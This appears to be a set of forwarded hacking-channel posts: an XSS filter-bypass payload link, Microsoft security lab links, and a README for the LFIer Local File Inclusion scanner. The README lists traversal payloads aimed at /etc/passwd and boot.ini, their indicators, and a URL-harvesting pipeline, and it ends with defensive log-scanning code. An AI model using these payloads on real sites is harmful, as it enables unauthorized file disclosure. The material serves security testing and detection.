UNDERCODE COMMUNITY
🦑 Undercode World!
@UndercodeCommunity


1️⃣ World's first platform that collects & analyzes every new hacking method.
+ Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE


Youtube.com/Undercode
by Undercode.help
Forwarded from UNDERCODE TESTING
🦑XSS payload generated using JSfuck, to bypass attribute filters 🛡️

https://pastebin.ubuntu.com/p/5sVVKjqXxx
Forwarded from Exploiting Crew (Pr1vAt3)
🦑🧪 Interactive Labs for Microsoft Certified: Security Operations Analyst Associate

🔹 Apply Microsoft Defender for Office 365 preset security policies
🧪 https://lnkd.in/d6BqZJtv

🔹 Deploy Microsoft Defender for Endpoint
🧪 https://lnkd.in/dd_Vj9VT

🔹 Mitigate Attacks with Microsoft Defender for Endpoint
🧪 https://lnkd.in/d273kEnd

🔹 Enable Microsoft Defender for Cloud
🧪 https://lnkd.in/d_nGMapG

🔹 Mitigate threats using Microsoft Defender for Cloud
🧪 https://lnkd.in/drJmedgr

🔹 Create queries for Microsoft Sentinel using Kusto Query Language (KQL)
🧪 https://lnkd.in/dQnQ_iEZ

🔹 Configure your Microsoft Sentinel environment
🧪 https://lnkd.in/dr4akkUX

🔹 Connect data to Microsoft Sentinel using data connectors
🧪 https://lnkd.in/dtRmAwFa

🔹 Connect Windows devices to Microsoft Sentinel using data connectors
🧪 https://lnkd.in/dpxmvabA

🔹 Connect Linux hosts to Microsoft Sentinel using data connectors
🧪 https://lnkd.in/dua8fHNm

🔹 Create workbooks
🧪 https://lnkd.in/dnawKhcP

🔹 Use Repositories in Microsoft Sentinel
🧪 https://lnkd.in/daQkDy9N

Ref: Dimitris Chatzidimitris
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 LFIer Tool :


LFIer is a powerful tool for detecting Local File Inclusion (LFI) vulnerabilities in web applications. By injecting payloads into URL parameters and analyzing responses, it efficiently identifies potential security issues. The tool is designed for flexibility, efficiency, and accuracy, even when scanning sites protected by WAFs or cloud-based defenses.


🌟 Key Features
1. ⚡️ High Performance: Async programming ensures rapid, non-blocking requests for large-scale scanning.
2. 🔍 Advanced Detection: Custom payloads and indicators accurately detect vulnerabilities.
3. 🛡 WAF/Cloud Bypass: Simulates real browser requests to bypass security measures.
4. 💉 Custom Payloads: Allows user-defined payload injection for flexibility.
5. 🌐 Custom Headers: Mimics client requests or bypasses filters with custom headers.
6. ⏱️ Rate Limiting: Prevents server overload by controlling request frequency and batching.
7. 📝 Flexible Output: Results in JSON or plain text for seamless integration into pipelines.
8. 🔧 Configurability: Adjustable settings for rate, timeouts, and workers.
9. 📂 Organized Scans: Groups results by domain or URL list.
10. 🔄 Easy Updates: One-click update mechanism ensures the latest features.

📥 Installation

# For Kali Linux (2024.4+)
git clone https://github.com/Cybersecurity-Ethical-Hacker/lfier.git
cd lfier
pipx install aiohttp
pipx install colorama
pipx install tqdm


# Using Virtual Environment (Recommended for Non-Kali Users)
1. Create and activate virtual environment:
   python3 -m venv venv
   source venv/bin/activate

2. Upgrade pip:
   pip install --upgrade pip

3. Clone the repository and install dependencies:
   git clone https://github.com/Cybersecurity-Ethical-Hacker/lfier.git
   cd lfier
   pip install -r requirements.txt


---

📄 Payloads & Indicators

# Linux Example
- Payloads:

/..\\../..\\../etc/passwd
../../../../../etc/passwd

- Indicators:

root:x:0:0:
nobody:x:65534:


# Windows Example
- Payloads:

C:/boot.ini

- Indicators:

[boot loader]
timeout=30


---

🧩 Parameterized URLs
To find URLs with parameters:
paramspider -d domain.com -s 2>&1 | grep -Ei "https?://" | sort -u | httpx -silent -status-code -mc 200,201,204,401,403 > live_urls.txt


---

🚀 Usage Examples

# Single Domain Scan
python lfier.py -d "https://domain.com/file.php?parameter=1234"


# Multiple URLs with Custom Rate
python lfier.py -l urls.txt -r 5


# Advanced Usage
- Custom headers:
  python lfier.py -d "https://example.com" -H "User-Agent: CustomAgent"

- JSON output:
  python lfier.py -l urls.txt -j -o results.json


---

❗️ Important Notes
- Always activate the virtual environment before using LFIer:
  source venv/bin/activate

- Regularly update LFIer to keep it effective against new protections:
  python lfier.py -u


This tool is a must-have for cybersecurity professionals looking to identify and remediate LFI vulnerabilities efficiently. Happy hunting!

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
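
The defender's side of the payload lists in the LFIer post above, as an added example that is not part of the original post or of LFIer itself: a web access log filter that normalizes each query parameter (percent-encoding, backslashes, repeated slashes) before matching, so the mixed-separator payload is caught by the same rule as the plain one. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
TRAVERSAL = re.compile(r'(^|/)\.\.(/|$)')      # a ".." path segment after normalization
DRIVE_PATH = re.compile(r'^[a-z]:/')           # absolute Windows path, e.g. c:/boot.ini
SENSITIVE = ('etc/passwd', 'boot.ini')         # files named in the post's payload lists

# Constructed sample lines (combined log format, documentation IPs); not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2025:10:00:01 +0000] "GET /file.php?parameter=1234 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2025:10:00:02 +0000] "GET /file.php?parameter=../../../../../etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [01/Jan/2025:10:00:03 +0000] "GET /file.php?parameter=%2F..%5C%5C..%2F..%5C%5C..%2Fetc%2Fpasswd HTTP/1.1" 404 210',
    '198.51.100.7 - - [01/Jan/2025:10:00:04 +0000] "GET /file.php?parameter=C%3A%2Fboot.ini HTTP/1.1" 403 199',
    '203.0.113.9 - - [01/Jan/2025:10:00:05 +0000] "GET /docs/view?page=intro.html HTTP/1.1" 200 900',
]

def normalize(value, max_rounds=3):
    """Undo leftover percent-encoding (bounded), unify separators, lowercase."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r'/{2,}', '/', value.replace('\\', '/').lower())

def inspect_line(line):
    """Return a finding for the first suspicious query parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for name, raw in parse_qsl(urlsplit(m['target']).query, keep_blank_values=True):
        value = normalize(raw)
        reasons = []
        if TRAVERSAL.search(value):
            reasons.append('traversal')
        if DRIVE_PATH.match(value):
            reasons.append('drive-path')
        if any(s in value for s in SENSITIVE):
            reasons.append('sensitive-file')
        if reasons:
            # served=True means the request got a 200: check that response for file contents.
            return {'ip': m['ip'], 'param': name, 'value': value,
                    'reasons': reasons, 'served': m['status'] == '200'}
    return None

def scan(lines):
    """Return the findings for every suspicious line, in log order."""
    return [f for f in map(inspect_line, lines) if f]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Findings with `served` set to true are the ones to triage first: an access log does not record the response body, so those responses still have to be checked for the indicator strings listed in the post (for example `root:x:0:0:`).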